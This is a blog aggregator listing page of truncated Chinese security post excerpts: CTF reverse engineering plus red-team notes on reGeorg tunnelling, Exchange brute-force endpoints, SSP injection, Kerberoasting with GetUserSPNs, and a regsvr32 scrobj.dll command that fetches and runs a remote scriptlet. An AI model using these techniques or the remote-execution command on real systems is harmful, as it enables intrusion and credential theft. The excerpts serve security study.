台部落rv0p111

簡單介紹下庫的概念庫是用戶定義的用戶的內容的邏輯表示的文件夾集合。通過在庫中包括文件夾，用戶告知 Windows 他或她的重要數據的位置。系統將索引啓用快速搜索和 Windows 資源管理器中的功能根據文件屬性和元數據更豐

2020-06-20 20:02:53

使用PEiD查看下是.net程序，這個程序是可以直接進行反編譯的所以我們使用ILSpy進行反編譯下，我們可以看到程序就是叫我們輸入一個字符串，然後和Kanxue2019一起給傳入a函數當中，算結果爲4RTlF9Ca2+o

2020-06-20 19:04:31

ISAPI 篩選器(ISAPI filter)導出函數 1、BOOL WINAPI GetFilterVersion( PHTTP_FILTER_VERSION pVer); 該函數是DLL篩選器第一次被加載到站點處理進程時被調

2020-06-20 19:04:31

首先先創建一個socket去運行，去連接想要連接的端口 reGeorgSocksProxy客戶端與服務端的通訊是基於session來區分的，並不支持在指定的session下進行 socket_set_nonblock 設置sock

2020-06-20 19:04:31

Exchange可以拿來爆破的接口 1、EWS 服務 URL，exchange web 服務配置 https://192.168.88.129/ews/exchange.asmx 2、還可以是owa接口–提供WEB方式郵件訪

2020-06-20 19:04:31

此篇文章結合學到的知識做個總結微軟有個api爲AddSecurityPackage，可以添加ssp，這裏就看下其的實現邏輯，這裏從將從公開這個 API 的 secur32.dll 這個 DLL 文件開始，主要爲本人進行了修改以

2020-06-20 19:04:31

Get-DomainGroupMember function Get-DomainGroupMember { <# .SYNOPSIS Return the members of a specific domain group.

2020-06-20 19:04:31

安卓題目，應該就是有關動態庫的題目了，所用對動態庫進行分析，利用工具IDA、jeb、vs等利用IDA動態調試，對sub_784進行分析，可以確定其實就是是rc4加密算法，以及下面的進行編碼的業務邏輯組成用到的其實就是RC4算

2020-06-20 19:04:31

C#代碼分析 $code = @' using System; using System.Runtime.InteropServices; using System.Drawing; using System.Drawin

2020-06-20 19:04:31

代碼如下所示 # Edits by Tim Medin # File: GetUserSPNS.ps1 # Contents: Query the domain to find SPNs that use User acc

2020-06-20 19:04:31

查看導出表，就一個main函數打開strings窗口，查看strings，可以看到下面是有很多字符串的程序運行，輸出結果如下所示，所以我們需要去定位到這個字符串，看看是哪裏調用的在我們的sub_4014C

2020-06-20 19:04:31

利用中文引擎搜索搜索到Kanxuectf這一串字符串的所在，然後下斷點之後就會發現它在和我們做比較，然後我們輸入的26個大寫的英文字母變成了下面的內容 89opqrstuvwxyzOPQRSTUVWXYZm 然後我們就找到了

2020-06-20 19:04:31

v2RayX的pac模式在MAC下的運轉模式如果我們開啓了PAC模式其實會幫我們在下圖的地方做配置接下來我們去查看這個PAC文件的內容，其中PAC文件當中必須要有FindProxyForURL(url, hos

2020-06-20 19:04:31

當我們無法獲取回顯判斷進程是否存活的方法調用命令regsvr32 /s /n /u /i:<url/aa.sct> scrobj.dll <?XML version="1.0"?> <scriptlet> <registrati

2020-06-20 19:04:31

main函數的前序執行過程簡單介紹 main函數其實是我們能控制的程序入口，但是程序編譯之後進行執行卻不是從main函數開始的，這裏主要講解下VC6.0++下編譯的程序在執行main函數之前的流程，其實主要爲在執行main函數之前

2020-04-14 08:56:29